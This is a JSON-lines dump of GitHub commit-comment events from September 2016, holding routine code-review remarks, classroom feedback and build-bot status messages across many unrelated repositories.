{"id":"4619212252","type":"CommitCommentEvent","actor":{"login":"kinke"},"repo":{"name":"ldc-developers/dmd-testsuite"},"payload":{"comment":{"id":19176127,"position":15,"line":142,"path":"Makefile","commit_id":"015c9ac4c90757c68091ca357c61d0627ae8463e","created_at":"2016-09-26T17:23:46Z","updated_at":"2016-09-26T17:23:46Z","body":"What I meant is that `gdb4181` is only disabled if there's both `OFF` and `NOTLS` in `GDB_FLAGS`, while you're only using `OFF`, `ON` and `ON_NOTLS`. I'd suggest using `OFF`, `ON` and `NOTLS` (= ON - TLS) instead."}},"created_at":"2016-09-26T17:23:46Z"}
{"id":"4619217890","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176136,"position":21,"line":21,"path":"README.md","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:24:51Z","updated_at":"2016-09-26T17:24:51Z","body":"Current implementation accepts time as a `String` when issuing a `POST` request, but returns it back as an `Array` on `GET`. While this is fine for the sample, this is not consistent for the production implementation in general."}},"created_at":"2016-09-26T17:24:51Z"}
{"id":"4619219093","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19176140,"position":null,"line":null,"path":null,"commit_id":"31d4cb7a1ae9bc4b19354acd6621e1f216d53eb3","created_at":"2016-09-26T17:25:05Z","updated_at":"2016-09-26T17:25:05Z","body":"@VoyagerOne : I raised the priority and posted on the forum https://groups.google.com/forum/?fromgroups=#!topic/fishcooking/J0ENTcccoYw\r\n\r\nI dont want to spam the github repo with useless PRs...\r\n"}},"created_at":"2016-09-26T17:25:05Z"}
{"id":"4619221110","type":"CommitCommentEvent","actor":{"login":"Siron55"},"repo":{"name":"emock/builditbreakit"},"payload":{"comment":{"id":19176145,"position":null,"line":null,"path":null,"commit_id":"f865dc8ee3e8d32b2f827006ea5a81ce4cad0b16","created_at":"2016-09-26T17:25:28Z","updated_at":"2016-09-26T17:25:28Z","body":"sorry für die binaries, werde ein ignore schreiben"}},"created_at":"2016-09-26T17:25:28Z"}
{"id":"4619221211","type":"CommitCommentEvent","actor":{"login":"rachel960122"},"repo":{"name":"Keweiqu/graphics"},"payload":{"comment":{"id":19176146,"position":5,"line":14,"path":"hws/hw3/main.c","commit_id":"8c87d3c6f3d01742cf86be5a14e60bffc2f2b011","created_at":"2016-09-26T17:25:29Z","updated_at":"2016-09-26T17:25:29Z","body":"Just wanted to see how the whole checkerboard looked lol...forgot to change it back"}},"created_at":"2016-09-26T17:25:29Z"}
{"id":"4619222824","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176148,"position":3,"line":3,"path":"README.md","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:25:48Z","updated_at":"2016-09-26T17:25:48Z","body":"Also, as a client, I would expect Maven command here to explain how to start the application."}},"created_at":"2016-09-26T17:25:48Z"}
{"id":"4619230670","type":"CommitCommentEvent","actor":{"login":"Lurker-Dorp"},"repo":{"name":"Lurker-Dorp/Minute"},"payload":{"comment":{"id":19176171,"position":null,"line":null,"path":null,"commit_id":"64687024d61b0e6518dcbdf9556bf309d940291e","created_at":"2016-09-26T17:27:15Z","updated_at":"2016-09-26T17:27:15Z","body":"Create README.md"}},"created_at":"2016-09-26T17:27:15Z"}
{"id":"4619231487","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"Chaparroa/hw_assignment_6"},"payload":{"comment":{"id":19176173,"position":5,"line":5,"path":"js/dropdown.js","commit_id":"1e7a2657ea0e4e2d7927febfa74c174266e1781d","created_at":"2016-09-26T17:27:24Z","updated_at":"2016-09-26T17:27:24Z","body":"You have the right idea here using `.val()` on `$(\"city-type\")`; however, when you pass a value into the method like you are doing here with \"city\" it is trying to set the value of the input. What you want to do instead is only get the value and then store it as a variable. Something like: \r\n```\r\nvar cityInput = $(\"#city-type\").val();\r\n```\r\n\r\nThe other piece of this is that you are missing is you want to get this value when the user changes an input, so perhaps try putting this in your filter function and then compare all the values in your if/else block to the variable `cityInput`"}},"created_at":"2016-09-26T17:27:24Z"}
{"id":"4619235187","type":"CommitCommentEvent","actor":{"login":"az4521"},"repo":{"name":"upnextfm/pienudes"},"payload":{"comment":{"id":19176183,"position":null,"line":null,"path":null,"commit_id":"7f4bd0662b19c5d4f7a91cc7bb013f2e7a9b3a97","created_at":"2016-09-26T17:28:04Z","updated_at":"2016-09-26T17:28:04Z","body":"PLEASE ROLL THIS BACK.\r\nIM SITTING THROUGH 10 MINUTES OF DAT BOI RAP BECAUSE I CANT SKIP IT NOW."}},"created_at":"2016-09-26T17:28:04Z"}
{"id":"4619237371","type":"CommitCommentEvent","actor":{"login":"alex94240"},"repo":{"name":"alex94240/Hello-World"},"payload":{"comment":{"id":19176189,"position":null,"line":null,"path":null,"commit_id":"972a16fc02cc2ccc2bfb80cc87e37b505f9a6571","created_at":"2016-09-26T17:28:27Z","updated_at":"2016-09-26T17:28:27Z","body":"okok"}},"created_at":"2016-09-26T17:28:27Z"}
{"id":"4619237774","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19176191,"position":null,"line":null,"path":null,"commit_id":"b29604235bbc78a243fbabcdf30d073a64bf1262","created_at":"2016-09-26T17:28:32Z","updated_at":"2016-09-26T17:28:32Z","body":"1973-AddDualDuctTerminals (cai799174) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b29604235bbc78a243fbabcdf30d073a64bf1262-PR2358-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-26T17:28:32Z"}
{"id":"4619238281","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176192,"position":23,"line":23,"path":"api/src/main/java/org/task/rest/BalanceCalculationRest.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:28:37Z","updated_at":"2016-09-26T17:28:37Z","body":"Why is this field not marked as `private`?"}},"created_at":"2016-09-26T17:28:37Z"}
{"id":"4619245686","type":"CommitCommentEvent","actor":{"login":"chmln"},"repo":{"name":"chmln/flatpickr"},"payload":{"comment":{"id":19176213,"position":null,"line":null,"path":null,"commit_id":"7f9a3cd4373d89907e6622f6b94f8faab9eb36de","created_at":"2016-09-26T17:29:54Z","updated_at":"2016-09-26T17:29:54Z","body":"@jamesdixon :+1: range mode just needs visual improvements, which will come in 2.0.1"}},"created_at":"2016-09-26T17:29:54Z"}
{"id":"4619249179","type":"CommitCommentEvent","actor":{"login":"skinnerjoe"},"repo":{"name":"woothemes/storefront"},"payload":{"comment":{"id":19176220,"position":null,"line":null,"path":null,"commit_id":"5a51793391efd39623edf6577cf0531ed163811e","created_at":"2016-09-26T17:30:31Z","updated_at":"2016-09-26T17:30:31Z","body":"Dropdowns for megamenus now do not work with this update."}},"created_at":"2016-09-26T17:30:31Z"}
{"id":"4619250046","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"ShreejitHSC/kataschool"},"payload":{"comment":{"id":19176223,"position":13,"line":13,"path":"src/test/java/com/kataskills/AppTest.java","commit_id":"23a52ebc98cc6b976f705cf0bb1bd414bdef5bf9","created_at":"2016-09-26T17:30:40Z","updated_at":"2016-09-26T17:30:40Z","body":"more meaningful names. For instance ``throwExceptionWhenNoArgumentPassed``"}},"created_at":"2016-09-26T17:30:40Z"}
{"id":"4619250164","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176224,"position":17,"line":17,"path":"api/src/main/java/org/task/rest/BalanceCalculationRest.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:30:42Z","updated_at":"2016-09-26T17:30:42Z","body":"We could have mapped this controller onto `/balance`, this way we would not have to repeat this path segment for every declaration of `@RequestMapping` in this class."}},"created_at":"2016-09-26T17:30:42Z"}
{"id":"4619251625","type":"CommitCommentEvent","actor":{"login":"marcogario"},"repo":{"name":"pysmt/pysmt"},"payload":{"comment":{"id":19176226,"position":null,"line":null,"path":null,"commit_id":"82295d0c98fb0b159f0a9bf7c410fdbcacc595c4","created_at":"2016-09-26T17:30:58Z","updated_at":"2016-09-26T17:30:58Z","body":"@mikand, can you take a look at the test ```test_parse_define_fun```? I was trying to document/improve the test, but this is not behaving as I was expecting.\r\n\r\nMy understanding is that ```z``` defined within the define-fun, should be a different ```z``` from the one in the declare fun. In particular, it should be a fresh variable, so that the expression within the define-fun is built using this new fresh variable. \r\n\r\nWhat do you think?"}},"created_at":"2016-09-26T17:30:58Z"}
{"id":"4619252344","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"ShreejitHSC/kataschool"},"payload":{"comment":{"id":19176227,"position":19,"line":19,"path":"src/test/java/com/kataskills/AppTest.java","commit_id":"23a52ebc98cc6b976f705cf0bb1bd414bdef5bf9","created_at":"2016-09-26T17:31:07Z","updated_at":"2016-09-26T17:31:07Z","body":"Same thoughts here.. ``throwExceptionWhenEmptyStringIsPassed``"}},"created_at":"2016-09-26T17:31:07Z"}
{"id":"4619259962","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"ShreejitHSC/kataschool"},"payload":{"comment":{"id":19176245,"position":18,"line":18,"path":"src/main/java/com/kataskills/App.java","commit_id":"7d450b78a42b604639deb0a3baa3faa488d8b341","created_at":"2016-09-26T17:32:26Z","updated_at":"2016-09-26T17:32:26Z","body":"wont a ``Set`` be better for contains()"}},"created_at":"2016-09-26T17:32:26Z"}
{"id":"4619271043","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176270,"position":10,"line":10,"path":"api/src/main/java/org/task/config/ApplicationConfig.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:34:29Z","updated_at":"2016-09-26T17:34:29Z","body":"This is a small issue, but I find formatting inconsistent in the code. Sometimes there are two blank lines after imports (like here), sometimes just one (see `BalanceCalculationRest`), sometimes end of the file contains several blank lines (see `README`), sometimes there are several blank lines before a closing curly of the class (see `ExceptionTaskHandler`). Formatting should be consistent!"}},"created_at":"2016-09-26T17:34:29Z"}
{"id":"4619275234","type":"CommitCommentEvent","actor":{"login":"alankelly"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19176275,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-26T17:35:12Z","updated_at":"2016-09-26T17:35:12Z","body":"Is the bitwise cast here necessary? I have tested this locally and it gives the same results without the bitwise cast and it is approx 40% quicker."}},"created_at":"2016-09-26T17:35:12Z"}
{"id":"4619276576","type":"CommitCommentEvent","actor":{"login":"vwchu"},"repo":{"name":"yusend/coreflightexec"},"payload":{"comment":{"id":19176278,"position":null,"line":null,"path":null,"commit_id":"bfa6f6f43ccb67d8af72d4ae2e009d9ef6ceb230","created_at":"2016-09-26T17:35:27Z","updated_at":"2016-09-26T17:35:27Z","body":"Closes #1"}},"created_at":"2016-09-26T17:35:27Z"}
{"id":"4619278646","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-Drabzes"},"payload":{"comment":{"id":19176283,"position":null,"line":null,"path":null,"commit_id":"00954d1268551277b3949ccf301d08a3067c1e76","created_at":"2016-09-26T17:35:50Z","updated_at":"2016-09-26T17:35:50Z","body":"Helpt dit écht?\r\n\r\nNu hebt ge enkel de naam vervangen door een int, wanneer we nu een nieuwe `WorkEthic` zouden toelaten in onze coffeeshop zitten we opnieuw in de problemen.\r\n\r\nOftewel, zoek een andere oplossing. Iets wat meer te maken heeft met de les die we vandaag geleerd hebben ;)"}},"created_at":"2016-09-26T17:35:50Z"}
{"id":"4619279267","type":"CommitCommentEvent","actor":{"login":"GourishVashisht"},"repo":{"name":"GourishVashisht/imad-2016-app"},"payload":{"comment":{"id":19176289,"position":null,"line":null,"path":null,"commit_id":"2d722ffb1678f00ab74cdd3bf37e7d35d2d7d071","created_at":"2016-09-26T17:35:57Z","updated_at":"2016-09-26T17:35:57Z","body":"again didi some changes"}},"created_at":"2016-09-26T17:35:57Z"}
{"id":"4619279908","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19176293,"position":null,"line":null,"path":null,"commit_id":"90830692917e17c15bd3e92d7aa9ece8c968148c","created_at":"2016-09-26T17:36:05Z","updated_at":"2016-09-26T17:36:05Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#blu-TSSuSY2dds-xWqEkbQ"}},"created_at":"2016-09-26T17:36:05Z"}
{"id":"4619283602","type":"CommitCommentEvent","actor":{"login":"jfalcou"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19176303,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-26T17:36:47Z","updated_at":"2016-09-26T17:36:47Z","body":"Did you tested with int32 input ? You see we work on pack of float that get put inside a pack o type with may be int32.\r\nConsidering bitwise_cast is a no-op, it looks strange that it has ANY effect on performances"}},"created_at":"2016-09-26T17:36:47Z"}
{"id":"4619286184","type":"CommitCommentEvent","actor":{"login":"jkoppel"},"repo":{"name":"jkoppel/project-ironfist"},"payload":{"comment":{"id":19176307,"position":null,"line":null,"path":null,"commit_id":"4552b25273cc7b500747f05bc248e334e0fde598","created_at":"2016-09-26T17:37:16Z","updated_at":"2016-09-26T17:37:16Z","body":":)"}},"created_at":"2016-09-26T17:37:16Z"}
{"id":"4619287761","type":"CommitCommentEvent","actor":{"login":"p6378"},"repo":{"name":"p6378/StartFile"},"payload":{"comment":{"id":19176313,"position":7,"line":7,"path":"app/src/main/java/mt/startfile/Start_v1.java","commit_id":"2abe388d6f62cf8d9d03e1dc086465aa7e083f2f","created_at":"2016-09-26T17:37:35Z","updated_at":"2016-09-26T17:37:35Z","body":"Следует использовать нотацию CamelCase"}},"created_at":"2016-09-26T17:37:35Z"}
{"id":"4619288122","type":"CommitCommentEvent","actor":{"login":"DanieLoche"},"repo":{"name":"7Robot/TRR2016"},"payload":{"comment":{"id":19176315,"position":null,"line":null,"path":null,"commit_id":"dece811bd61b591cbdd973229bb861def09679c3","created_at":"2016-09-26T17:37:38Z","updated_at":"2016-09-26T17:37:38Z","body":"C'est la base pour le 110 mètres Robots qui a lieu CE Mercredi... ;)\r\n\r\nDonc oui : on a jamais été aussi larges !! :D"}},"created_at":"2016-09-26T17:37:38Z"}
{"id":"4619295658","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176334,"position":26,"line":26,"path":"api/src/main/java/org/task/rest/BalanceCalculationRest.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:39:03Z","updated_at":"2016-09-26T17:39:03Z","body":"Suggestions:\r\n\r\n* Avoid `filter` as a variable name . `TaskConditions` includes `timeout` which is a maximum running time of the task, thus not a logical part of the filter.\r\n\r\n"}},"created_at":"2016-09-26T17:39:03Z"}
{"id":"4619296006","type":"CommitCommentEvent","actor":{"login":"atierant"},"repo":{"name":"symfony-fr/symfony-docs-fr"},"payload":{"comment":{"id":19176337,"position":null,"line":null,"path":null,"commit_id":"a6fe5086b211bac4cc533cf8cdb53fdaf416f622","created_at":"2016-09-26T17:39:08Z","updated_at":"2016-09-26T17:39:08Z","body":"Nostalgique ? :palm_tree: "}},"created_at":"2016-09-26T17:39:08Z"}
{"id":"4619296258","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-KaanKoseoglu"},"payload":{"comment":{"id":19176338,"position":null,"line":null,"path":null,"commit_id":"60b85b480b8a8ecaa9fa23ca715989dafdea295a","created_at":"2016-09-26T17:39:10Z","updated_at":"2016-09-26T17:39:10Z","body":"Probeer ook eens een nieuwe Barista toe te voegen die ook \"gemma\" heet in MoonDollahsCoffeeShop.\r\n\r\nHopelijk denkt ge dan nog eens na over die `if else` in de Barista constructor. ;)"}},"created_at":"2016-09-26T17:39:10Z"}
{"id":"4619302227","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19176360,"position":66,"line":66,"path":"src/toil_scripts/vg_evaluation_pipeline/README.md","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T17:40:17Z","updated_at":"2016-09-26T17:40:17Z","body":"Why are you passing --overwrite here?"}},"created_at":"2016-09-26T17:40:17Z"}
{"id":"4619305592","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-BramVV"},"payload":{"comment":{"id":19176370,"position":null,"line":null,"path":null,"commit_id":"d587f1d450d8de7f11eccff717ac3a9df2b89949","created_at":"2016-09-26T17:40:48Z","updated_at":"2016-09-26T17:40:48Z","body":"Yup, da werkt nu.\r\n\r\nDie `if else` in commentaar mag gewoon weg nu he.\r\n\r\nWat ik me wel af vraag uit uw commit message, is of ge uw testen gerunt hebt na uw changes?\r\n\r\nWant uw testen gaan u vertellen of het werkt of niet. ;)\r\n\r\nVoor de rest: goed gedaan."}},"created_at":"2016-09-26T17:40:48Z"}
{"id":"4619308727","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19176378,"position":null,"line":null,"path":null,"commit_id":"f9bb294b070c9a0f66341846548e910b612d8caa","created_at":"2016-09-26T17:41:22Z","updated_at":"2016-09-26T17:41:22Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PiNw6_l2RnSMQsIUn5ZywQ"}},"created_at":"2016-09-26T17:41:22Z"}
{"id":"4619312652","type":"CommitCommentEvent","actor":{"login":"venomiousrex"},"repo":{"name":"Kevinyucan/Assignment02-1"},"payload":{"comment":{"id":19176395,"position":null,"line":null,"path":null,"commit_id":"017a765b0a78791e36d7474fdc460feaccfe242c","created_at":"2016-09-26T17:42:07Z","updated_at":"2016-09-26T17:42:07Z","body":"Kevin pls"}},"created_at":"2016-09-26T17:42:07Z"}
{"id":"4619315291","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19176402,"position":9,"line":9,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T17:42:36Z","updated_at":"2016-09-26T17:42:36Z","body":"Not sure this example is correct given the name of this file."}},"created_at":"2016-09-26T17:42:36Z"}
{"id":"4619315733","type":"CommitCommentEvent","actor":{"login":"jfalcou"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19176405,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-26T17:42:41Z","updated_at":"2016-09-26T17:42:41Z","body":"Considering that this is a common function, it \"works\" on AVX because pack eats up m256 its internal m256i.\r\nIt wont work on other extensions without.\r\n\r\nCan you extract the generated ASM of with and without the cast so we can see i somethign is not missing elsewhere."}},"created_at":"2016-09-26T17:42:41Z"}
{"id":"4619317688","type":"CommitCommentEvent","actor":{"login":"denisltatar"},"repo":{"name":"Kevinyucan/Assignment02-1"},"payload":{"comment":{"id":19176415,"position":null,"line":null,"path":null,"commit_id":"017a765b0a78791e36d7474fdc460feaccfe242c","created_at":"2016-09-26T17:43:04Z","updated_at":"2016-09-26T17:43:04Z","body":"^^"}},"created_at":"2016-09-26T17:43:04Z"}
{"id":"4619320135","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-nickbleyen"},"payload":{"comment":{"id":19176424,"position":null,"line":null,"path":null,"commit_id":"0954329eb5ea3971e0204d669da567b40460edcf","created_at":"2016-09-26T17:43:31Z","updated_at":"2016-09-26T17:43:31Z","body":"Waarom houdt ge die `if else` structuur nog over?"}},"created_at":"2016-09-26T17:43:31Z"}
{"id":"4619321224","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176428,"position":41,"line":41,"path":"api/src/main/java/org/task/rest/ExceptionTaskHandler.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:43:44Z","updated_at":"2016-09-26T17:43:44Z","body":"We are losing information about the exception stack trace in all these cases. Having just the message is not enough for productive troubleshooting."}},"created_at":"2016-09-26T17:43:44Z"}
{"id":"4619335279","type":"CommitCommentEvent","actor":{"login":"georgebrock"},"repo":{"name":"bernerdschaefer/dotfiles"},"payload":{"comment":{"id":19176460,"position":null,"line":null,"path":null,"commit_id":"1dd5a1d8d8a10ff294047e0ea5a9e7c240fc1c8c","created_at":"2016-09-26T17:46:12Z","updated_at":"2016-09-26T17:46:12Z","body":"Nice trick!\r\n\r\nIt's possibly also worth noting that gitsh will automatically correct `git foo` to just `foo` if you have `help.autocorrect` set to anything other than 0."}},"created_at":"2016-09-26T17:46:12Z"}
{"id":"4619336649","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-RobinLycops"},"payload":{"comment":{"id":19176467,"position":null,"line":null,"path":null,"commit_id":"9410571a96a98fe7e6dd2b1f39c4e172dde961b1","created_at":"2016-09-26T17:46:28Z","updated_at":"2016-09-26T17:46:28Z","body":"Die `.containsOnly` moogt ge houden, dat pakt evengoed ne `varargs` van WorkEthics aan. Dat dient er enkel voor dat andere soorten WorkEthics er niet in horen te staan.\r\n\r\nDus stel dat alle \"gemma\" baristas ook nog een andere WorkEthic zouden hebben, dan zou `.contains` daar niet op falen, terwijl `.containsOnly` daar wel op zou falen.\r\n\r\nVoor de rest zeer goed gedaan. Tof dat ge ook die testen van de coffeeshop hebt uitgebreid."}},"created_at":"2016-09-26T17:46:28Z"}
{"id":"4619338129","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176475,"position":23,"line":23,"path":"api/src/main/java/org/task/rest/ExceptionTaskHandler.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:46:45Z","updated_at":"2016-09-26T17:46:45Z","body":"It would make sense to apply different log levels to different exceptions. Cases like _task not found_ are critical and using `warning` or `info` level is fine for them, while `RuntimeException` is not expected, so it makes sense to treat as an `error`."}},"created_at":"2016-09-26T17:46:45Z"}
{"id":"4619338605","type":"CommitCommentEvent","actor":{"login":"shadycuz"},"repo":{"name":"firehol/netdata"},"payload":{"comment":{"id":19176477,"position":null,"line":null,"path":null,"commit_id":"8b136be32afcc7ddeb66b19e7e786e832f64a785","created_at":"2016-09-26T17:46:49Z","updated_at":"2016-09-26T17:46:49Z","body":"Hey this is my job ;)"}},"created_at":"2016-09-26T17:46:49Z"}
{"id":"4619338774","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19176480,"position":null,"line":null,"path":null,"commit_id":"31d4cb7a1ae9bc4b19354acd6621e1f216d53eb3","created_at":"2016-09-26T17:46:52Z","updated_at":"2016-09-26T17:46:52Z","body":"Please wait till you get a response..."}},"created_at":"2016-09-26T17:46:52Z"}
{"id":"4619338927","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19176481,"position":null,"line":null,"path":null,"commit_id":"d8ff04e14a4b932965f0eb9eede09341e0bfb70a","created_at":"2016-09-26T17:46:53Z","updated_at":"2016-09-26T17:46:53Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [composer.json](https://github.com/pantheon-systems/documentation/commit/d8ff04e14a4b932965f0eb9eede09341e0bfb70a/composer.json)\n- [composer.lock](https://github.com/pantheon-systems/documentation/commit/d8ff04e14a4b932965f0eb9eede09341e0bfb70a/composer.lock)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [source/docs/assets/terminuscommands.json](https://github.com/pantheon-systems/documentation/commit/d8ff04e14a4b932965f0eb9eede09341e0bfb70a/source/docs/assets/terminuscommands.json)\n"}},"created_at":"2016-09-26T17:46:53Z"}
{"id":"4619340155","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19176486,"position":89,"line":89,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T17:47:07Z","updated_at":"2016-09-26T17:47:07Z","body":"Is it smart to buffer all of this in memory? VG can be very talkative."}},"created_at":"2016-09-26T17:47:07Z"}
{"id":"4619341925","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19176497,"position":null,"line":null,"path":null,"commit_id":"31d4cb7a1ae9bc4b19354acd6621e1f216d53eb3","created_at":"2016-09-26T17:47:25Z","updated_at":"2016-09-26T17:47:25Z","body":"Ok\nIl 26/set/2016 07:46 PM, \"VoyagerOne\" <notifications@github.com> ha scritto:\n\n> Please wait till you get a response...\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Stefano80/Stockfish/commit/31d4cb7a1ae9bc4b19354acd6621e1f216d53eb3#commitcomment-19176480>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIWmz3L4Cgn4okDWe1tki5p5Bx43ZFpuks5quAUMgaJpZM4KAfnw>\n> .\n>\n"}},"created_at":"2016-09-26T17:47:25Z"}
{"id":"4619343612","type":"CommitCommentEvent","actor":{"login":"rainers"},"repo":{"name":"ldc-developers/dmd-testsuite"},"payload":{"comment":{"id":19176502,"position":15,"line":142,"path":"Makefile","commit_id":"015c9ac4c90757c68091ca357c61d0627ae8463e","created_at":"2016-09-26T17:47:43Z","updated_at":"2016-09-26T17:47:43Z","body":"Yeah, that's what I just did."}},"created_at":"2016-09-26T17:47:43Z"}
{"id":"4619343976","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19176503,"position":null,"line":null,"path":null,"commit_id":"31d4cb7a1ae9bc4b19354acd6621e1f216d53eb3","created_at":"2016-09-26T17:47:46Z","updated_at":"2016-09-26T17:47:46Z","body":"@Stefano80 \r\nThanks."}},"created_at":"2016-09-26T17:47:46Z"}
{"id":"4619344092","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19176504,"position":99,"line":99,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T17:47:47Z","updated_at":"2016-09-26T17:47:47Z","body":"lenght -> length"}},"created_at":"2016-09-26T17:47:47Z"}
{"id":"4619350409","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"chautruongthinh/android_packages_apps_CMUpdater"},"payload":{"comment":{"id":19176516,"position":6,"line":8,"path":"AndroidManifest.xml","commit_id":"88826e0bfe6d368c494d28417b9da84df8c0ce4a","created_at":"2016-09-26T17:48:50Z","updated_at":"2016-09-26T17:48:50Z","body":"Since its android N shouldnt this be 24?"}},"created_at":"2016-09-26T17:48:50Z"}
{"id":"4619351214","type":"CommitCommentEvent","actor":{"login":"denzilferreira"},"repo":{"name":"denzilferreira/aware-client"},"payload":{"comment":{"id":19176517,"position":null,"line":null,"path":null,"commit_id":"d55260daeeef54078e2d9ee5d9fd069930737e77","created_at":"2016-09-26T17:48:58Z","updated_at":"2016-09-26T17:48:58Z","body":"To solve this, use a private static Toast variable on the IntentService, assign it to the instantiated Toast.makeText and then in the onDestroy of the IntentService, dismiss the toast. You can also make the Toast.LENGTH_SHORT instead."}},"created_at":"2016-09-26T17:48:58Z"}
{"id":"4619351360","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19176518,"position":null,"line":null,"path":null,"commit_id":"947b052f2da9a4c6bbe6769535b4910f6e17c2f3","created_at":"2016-09-26T17:49:00Z","updated_at":"2016-09-26T17:49:00Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VZ_xtM3GR2mGBbb3xzh1GQ"}},"created_at":"2016-09-26T17:49:00Z"}
